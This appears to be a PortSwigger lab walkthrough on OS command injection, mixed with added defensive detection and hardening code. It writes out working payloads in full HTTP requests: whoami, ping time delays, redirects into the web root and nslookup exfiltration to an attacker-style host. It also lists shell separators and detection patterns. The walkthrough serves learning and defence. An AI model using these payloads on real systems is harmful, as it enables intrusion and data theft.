Injecting OS Commands
Appending `&` after the injected command skips whatever arguments follow the injection point, so the injected command is still executed:
Placing the additional command separator `&` after the injected command is useful because it separates the injected command from whatever follows the injection point. This reduces the chance that what follows will prevent the injected command from executing.
Lab: OS Command Injection, Simple Case
Use the following request:
```http
POST /product/stock HTTP/2
Host: 0a93001904f923008052c19100e200c5.web-security-academy.net
Cookie: session=cczYLP1DDaef5BTdY0u7FbNIyrTI8wVp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Referer: https://0a93001904f923008052c19100e200c5.web-security-academy.net/product?productId=1
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
Origin: https://0a93001904f923008052c19100e200c5.web-security-academy.net

productId=1&storeId=%26%20%77%68%6f%61%6d%69
```
The injection point is `storeId` and the payload is `& whoami`.
Response:
```http
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 13

peter-rlYkVA
```
Useful Commands
Commands for gathering information about the system once the vulnerability has been confirmed:
After you identify an OS command injection vulnerability, it's useful to execute some initial commands to obtain information about the system. Below is a summary of some commands that are useful on Linux and Windows platforms:
| Purpose of command | Linux | Windows |
| --------------------- | ------------- | --------------- |
| Name of current user | `whoami` | `whoami` |
| Operating system | `uname -a` | `ver` |
| Network configuration | `ifconfig` | `ipconfig /all` |
| Network connections | `netstat -an` | `netstat -an` |
| Running processes | `ps -ef` | `tasklist` |
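From the defender's side, the commands in this table are the first thing an attacker runs after a successful injection, and they show up in endpoint telemetry as child processes of the web application (usually via an intermediate `sh -c` or `cmd.exe /c`). The following is an added example, not code from PortSwigger or any lab; the process events are constructed, and the set of web-server image names is an assumption about a typical deployment.

```python
"""Added example: spotting the recon commands from the table in process
telemetry. Events are constructed; WEB_SERVER_IMAGES is an assumed list."""
from typing import Dict, List, Optional

# Recon binaries from the table (Linux and Windows), without .exe suffixes.
# "ver" is a cmd.exe builtin and never appears as its own process.
RECON_IMAGES = {"whoami", "uname", "ifconfig", "ipconfig", "netstat", "ps", "tasklist"}
# Processes that normally have no business spawning those (assumption).
WEB_SERVER_IMAGES = {"nginx", "apache2", "httpd", "w3wp", "java", "node", "gunicorn"}
MAX_DEPTH = 4  # how far up the process tree to look for a web-server ancestor

# Constructed process-creation events: one injected chain on Linux (pid 300),
# a benign cron job that also runs ps (pid 401), and one chain on Windows (pid 501).
EVENTS = [
    {"pid": 200, "ppid": 1, "image": "java", "cmdline": "java -jar shop.jar"},
    {"pid": 300, "ppid": 200, "image": "sh", "cmdline": "sh -c stockreport.pl 1 & whoami"},
    {"pid": 301, "ppid": 300, "image": "perl", "cmdline": "perl stockreport.pl 1"},
    {"pid": 302, "ppid": 300, "image": "whoami", "cmdline": "whoami"},
    {"pid": 400, "ppid": 1, "image": "cron", "cmdline": "/usr/sbin/cron"},
    {"pid": 401, "ppid": 400, "image": "sh", "cmdline": "sh -c ps -ef"},
    {"pid": 402, "ppid": 401, "image": "ps", "cmdline": "ps -ef"},
    {"pid": 500, "ppid": 1, "image": "w3wp.exe", "cmdline": "w3wp.exe -ap AppPool"},
    {"pid": 501, "ppid": 500, "image": "cmd.exe", "cmdline": "cmd.exe /c stock.bat 1 & ipconfig /all"},
    {"pid": 502, "ppid": 501, "image": "ipconfig.exe", "cmdline": "ipconfig /all"},
]


def normalize(image: str) -> str:
    """Strip directories and a trailing .exe so Linux and Windows names compare alike."""
    name = image.rsplit("/", 1)[-1].rsplit("\\", 1)[-1].lower()
    return name[:-4] if name.endswith(".exe") else name


def web_server_ancestor(pid: int, by_pid: Dict[int, dict]) -> Optional[dict]:
    """Walk parents up to MAX_DEPTH and return the first web-server process, if any."""
    current = by_pid.get(pid)
    for _ in range(MAX_DEPTH):
        if current is None:
            return None
        current = by_pid.get(current["ppid"])
        if current and normalize(current["image"]) in WEB_SERVER_IMAGES:
            return current
    return None


def find_recon_from_web_server(events: List[dict]) -> List[dict]:
    """Flag recon binaries whose ancestry (through any shell) leads to a web server."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        if normalize(e["image"]) not in RECON_IMAGES:
            continue
        origin = web_server_ancestor(e["pid"], by_pid)
        if origin:
            findings.append({"pid": e["pid"], "cmdline": e["cmdline"],
                             "web_server_pid": origin["pid"], "shell_pid": e["ppid"]})
    return findings


if __name__ == "__main__":
    for f in find_recon_from_web_server(EVENTS):
        print(f)
```

The walk through intermediate shells matters: the injected `whoami` is a grandchild of the application, not a direct child, so a rule that only checks the immediate parent misses it. The cron-launched `ps -ef` is ignored because no web-server process is among its ancestors.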
Blind OS Command Injection Vulnerabilities
Detecting Blind OS Command Injection Using Time Delays
Inducing a delay to detect OS command injection:
You can use an injected command to trigger a time delay, enabling you to confirm that the command was executed based on the time that the application takes to respond. The `ping` command is a good way to do this, because it lets you specify the number of ICMP packets to send. This enables you to control the time taken for the command to run:
`& ping -c 10 127.0.0.1 &`
This command causes the application to ping its loopback network adapter for 10 seconds.
Lab: Blind OS Command Injection with Time Delays
Use the following request:
```http
POST /feedback/submit HTTP/2
Host: 0a4000b7038719a88228d3f5000200a6.web-security-academy.net
Cookie: session=7b0kI9kakKj85aHJZWvipy3Hlk6L6f4u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: https://0a4000b7038719a88228d3f5000200a6.web-security-academy.net
Referer: https://0a4000b7038719a88228d3f5000200a6.web-security-academy.net/feedback

csrf=I7cTeLPFL0G4outrL4lCl3L6iQjw9YnD&name=a&email=%26%20%70%69%6e%67%20%2d%63%20%31%30%20%31%32%37%2e%30%2e%30%2e%31%20%26&subject=a&message=a
```
With `email` set to `& ping -c 10 127.0.0.1 &`.
The response arrived after roughly 9.3 - 9.4 seconds, which shows that the delay was triggered successfully.
Exploiting Blind OS Command Injection by Redirecting Output
Exploitation by redirecting output:
You can redirect the output from the injected command into a file within the web root that you can then retrieve using the browser. For example, if the application serves static resources from the filesystem location `/var/www/static`, then you can submit the following input:
`& whoami > /var/www/static/whoami.txt &`
Lab: Blind OS Command Injection with Output Redirection
Use the following request:
```http
POST /feedback/submit HTTP/2
Host: 0a64009404b67095846dfe4f00fd0003.web-security-academy.net
Cookie: session=Y8R1zqAP9BCX0kd88oMwlX8Uu8SviNIi
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: https://0a64009404b67095846dfe4f00fd0003.web-security-academy.net
Referer: https://0a64009404b67095846dfe4f00fd0003.web-security-academy.net/feedback

csrf=hivBjYuPeZDnYfCbNnkUgzjhWwxc2uAB&name=%20%26%20whoami%20%3e%20%2fvar%2fwww%2fimages%2fwhoami.txt%20%26&email=a%40a.com&subject=a&message=a
```
The injection point is `name` and the payload is `& whoami > /var/www/images/whoami.txt &`.
Then send a GET request to `/image?filename=whoami.txt` to retrieve the username. The response to that request:
```http
HTTP/2 200 OK
Content-Type: text/plain; charset=utf-8
X-Frame-Options: SAMEORIGIN
Content-Length: 13

peter-fQugh3
```
Exploiting Blind OS Command Injection Using Out-of-band (OAST) Techniques
Using an out-of-band interaction to detect OS command injection:
You can use an injected command that will trigger an out-of-band network interaction with a system that you control, using OAST techniques. For example:
`& nslookup kgji2ohoyw.web-attacker.com &`
Extracting data through the out-of-band interaction:
The out-of-band channel provides an easy way to exfiltrate the output from injected commands:
``& nslookup `whoami`.kgji2ohoyw.web-attacker.com &``
This causes a DNS lookup to the attacker's domain containing the result of the `whoami` command:
`wwwuser.kgji2ohoyw.web-attacker.com`
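The three blind techniques above (time delay, output redirection, out-of-band lookup) each leave a recognisable trace in the request parameters, and the time-delay one also correlates with server-side response time. The following is an added example, not code from PortSwigger or the labs: it URL-decodes form bodies the way the application would, flags values that contain one of the separators the page lists, and classifies the payload style. The log records are constructed from the shapes of the lab requests; the field names and the `oast.example` domain are placeholders.

```python
"""Added example: classify blind-injection payload styles in request logs.
Records are constructed; field names and oast.example are placeholders."""
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs

# Separators listed on the page, plus the inline-execution forms.
SEPARATOR_RE = re.compile(r"(&&|\|\||[&|;`\n]|\$\()")
PING_RE = re.compile(r"\bping\b[^&|;]*?-[cn]\s*(\d+)")   # -c on Linux, -n on Windows
SLEEP_RE = re.compile(r"\bsleep\s+(\d+)")
REDIRECT_RE = re.compile(r">\s*(/\S+)")                   # output redirected to a path
OAST_RE = re.compile(r"\b(nslookup|dig|curl|wget)\b\s+(\S+)")

# Constructed records: raw form body plus server processing time in seconds
# (the figure nginx's $request_time or an APM tool would record).
SAMPLE_LOG = [
    {"path": "/product/stock", "body": "productId=1&storeId=1", "seconds": 0.02},
    {"path": "/product/stock", "body": "productId=1&storeId=%26%20whoami", "seconds": 0.05},
    {"path": "/feedback/submit",
     "body": "csrf=x&name=a&email=%26%20ping%20-c%2010%20127.0.0.1%20%26&subject=a&message=a",
     "seconds": 9.35},
    {"path": "/feedback/submit",
     "body": "csrf=x&name=%20%26%20whoami%20%3e%20%2fvar%2fwww%2fimages%2fwhoami.txt%20%26"
             "&email=a%40a.com&subject=a&message=a",
     "seconds": 0.04},
    {"path": "/feedback/submit",
     "body": "csrf=x&name=a&email=%26%20nslookup%20%60whoami%60.oast.example%20%26&subject=a&message=a",
     "seconds": 0.30},
]


def classify(value: str, seconds: float) -> Optional[str]:
    """Return a finding label for one decoded parameter value, or None if clean."""
    if not SEPARATOR_RE.search(value):
        return None
    m = PING_RE.search(value) or SLEEP_RE.search(value)
    if m:
        expected = int(m.group(1))
        # ping -c N at the default 1 s interval takes about N-1 s; sleep N takes N s.
        # A matching response time turns the payload sighting into a confirmed execution.
        confirmed = seconds >= expected - 1
        return "time-delay (confirmed)" if confirmed else "time-delay (unconfirmed)"
    m = REDIRECT_RE.search(value)
    if m:
        return f"output-redirection to {m.group(1)}"
    m = OAST_RE.search(value)
    if m:
        return f"out-of-band {m.group(1)} to {m.group(2)}"
    return "separator"


def scan(records: List[dict]) -> List[Tuple[str, str, str]]:
    """Decode each body as the app would and return (path, parameter, label) findings."""
    findings = []
    for rec in records:
        params = parse_qs(rec["body"], keep_blank_values=True)
        for name, values in params.items():
            for value in values:
                label = classify(value, rec["seconds"])
                if label:
                    findings.append((rec["path"], name, label))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Decoding before matching is the important step: in the raw body the injected `&` is `%26` and the backticks are `%60`, so a rule that inspects the undecoded body sees no separator at all. Note that a literal `&` in the body is a parameter delimiter, which is exactly why `parse_qs` must do the splitting before the values are examined.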
Lab: Blind OS Command Injection with Out-of-band Interaction
Use the following request:
```http
POST /feedback/submit HTTP/2
Host: 0aef009303f0317f809ae9550049004c.web-security-academy.net
Cookie: session=RQ5kEivfXS305Vx0ZJDMtMoLuuuNhAWa
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 308
Origin: https://0aef009303f0317f809ae9550049004c.web-security-academy.net
Referer: https://0aef009303f0317f809ae9550049004c.web-security-academy.net/feedback

csrf=BgCNBUUOOxMuqmR1x4wXc1EoqVZoVSWo&name=a&email=%26%20nslookup%20mh7fiuon2vcjg705brp8x3jvzm5dt3hs.oastify.com%20%26&subject=a&message=a
```
The injection point is `email` and the payload is `& nslookup mh7fiuon2vcjg705brp8x3jvzm5dt3hs.oastify.com &`. The value `mh7fiuon2vcjg705brp8x3jvzm5dt3hs.oastify.com` is the Burp Suite Collaborator domain.
After sending the request, two DNS queries were received:
The Collaborator server received a DNS lookup of type A for the domain name **mh7fiuon2vcjg705brp8x3jvzm5dt3hs.oastify.com**.
The lookup was received from IP address 3.251.120.108:58034 at 2025-Apr-20 01:33:51.319 UTC.
The Collaborator server received a DNS lookup of type A for the domain name **mh7fiuon2vcjg705brp8x3jvzm5dt3hs.oastify.com**.
The lookup was received from IP address 3.251.120.100:18601 at 2025-Apr-20 01:33:51.319 UTC.
Lab: Blind OS Command Injection with Out-of-band Data Exfiltration
Use the following request:
```http
POST /feedback/submit HTTP/2
Host: 0ac9007c0433aaaa80191c5b006d0018.web-security-academy.net
Cookie: session=d70u1cylUEnzOjb9EakPY9Y4pUmTXk8W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:137.0) Gecko/20100101 Firefox/137.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 151
Origin: https://0ac9007c0433aaaa80191c5b006d0018.web-security-academy.net
Referer: https://0ac9007c0433aaaa80191c5b006d0018.web-security-academy.net/feedback

csrf=ua5GwOvV2zqP3iov6fMG6f44c3T1Ph2k&name=a&email=%26%20nslookup%20%60whoami%60.2z2v0a63kbuzynilt77ofj1bh2ntbkz9.oastify.com%20%26&subject=a&message=a
```
The injection point is `email` and the payload is ``& nslookup `whoami`.2z2v0a63kbuzynilt77ofj1bh2ntbkz9.oastify.com &`` (the backticks are sent as `%60`, so the shell substitutes the output of `whoami` into the hostname).
After sending the request, two DNS queries reached the Burp Collaborator server:
The Collaborator server received a DNS lookup of type A for the domain name **peter-niBLE4.2z2v0a63kbuzynilt77ofj1bh2ntbkz9.oastify.com**.
The lookup was received from IP address 3.248.186.189:29253 at 2025-Apr-20 01:42:30.108 UTC.
The Collaborator server received a DNS lookup of type A for the domain name **peter-niBLE4.2z2v0a63kbuzynilt77ofj1bh2ntbkz9.oastify.com**.
The lookup was received from IP address 3.248.186.224:17126 at 2025-Apr-20 01:42:30.108 UTC.
Submit the solution with the value `peter-niBLE4` to complete the lab.
Ways of Injecting OS Commands
Ways to carry out OS command injection:
A number of characters function as command separators, allowing commands to be chained together. The following command separators work on both Windows and Unix-based systems:
- `&`
- `&&`
- `|`
- `||`
The following command separators work only on Unix-based systems:
- `;`
- Newline (`0x0a` or `\n`)
On Unix-based systems, you can also use backticks or the dollar character to perform inline execution of an injected command within the original command:
- `` ` `` injected command `` ` ``
- `$(` injected command `)`
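Every separator and inline-execution form in this list only matters because the application pastes user input into a string that a shell parses. The following is an added example, not code from PortSwigger or the stock-check lab: it places the vulnerable pattern (string concatenation destined for `shell=True`) beside a hardened version that allowlists the two ids and passes them as an argv list with no shell, and it shows that an argv element containing `& whoami` is delivered to the child verbatim. The command name `stockreport.pl` and the id format are assumptions for illustration.

```python
"""Added example: vulnerable vs hardened command construction.
'stockreport.pl' and the 1-6 digit id format are assumptions."""
import re
import subprocess
import sys

# Separators and inline-execution tokens from the list above; any of them
# changes the meaning of a command line when a shell parses it.
SHELL_SEPARATORS = ("&&", "||", "&", "|", ";", "\n", "`", "$(")


def build_stock_command_unsafe(product_id: str, store_id: str) -> str:
    """Vulnerable: the string a naive implementation would hand to
    subprocess.run(..., shell=True). Returned, not executed, so the effect
    of an injected separator is visible in the result."""
    return f"stockreport.pl {product_id} {store_id}"


def validate_id(value: str) -> str:
    """Allowlist: an id is 1-6 decimal digits. Everything else, including
    every separator above, is rejected before any command is built."""
    if not re.fullmatch(r"[0-9]{1,6}", value):
        raise ValueError(f"invalid id: {value!r}")
    return value


def build_stock_argv(product_id: str, store_id: str) -> list:
    """Hardened: validated values in an argv list for subprocess.run with
    shell=False (the default). No shell parses the arguments, so separators
    would have no special meaning even if validation were looser."""
    return ["stockreport.pl", validate_id(product_id), validate_id(store_id)]


def echo_argument_without_shell(arg: str) -> str:
    """Run a child without a shell and return exactly what it received as
    argv[1]: a value like '& whoami' comes through as plain text."""
    result = subprocess.run(
        [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", arg],
        capture_output=True, text=True, check=True,
    )
    return result.stdout


def contains_separator(value: str) -> bool:
    """Cheap pre-check useful for logging rejected input (not a substitute
    for the allowlist)."""
    return any(sep in value for sep in SHELL_SEPARATORS)


if __name__ == "__main__":
    payload = "& whoami"
    print(build_stock_command_unsafe("1", payload))   # a second command is appended
    print(echo_argument_without_shell(payload))       # printed literally, not run
    try:
        build_stock_argv("1", payload)
    except ValueError as err:
        print("rejected:", err)
```

The allowlist is the primary control and the argv list is the backstop: even if a future change widens what `validate_id` accepts, nothing in the list is ever interpreted by `/bin/sh` or `cmd.exe`, so `&`, `;`, backticks and `$(` stay ordinary characters.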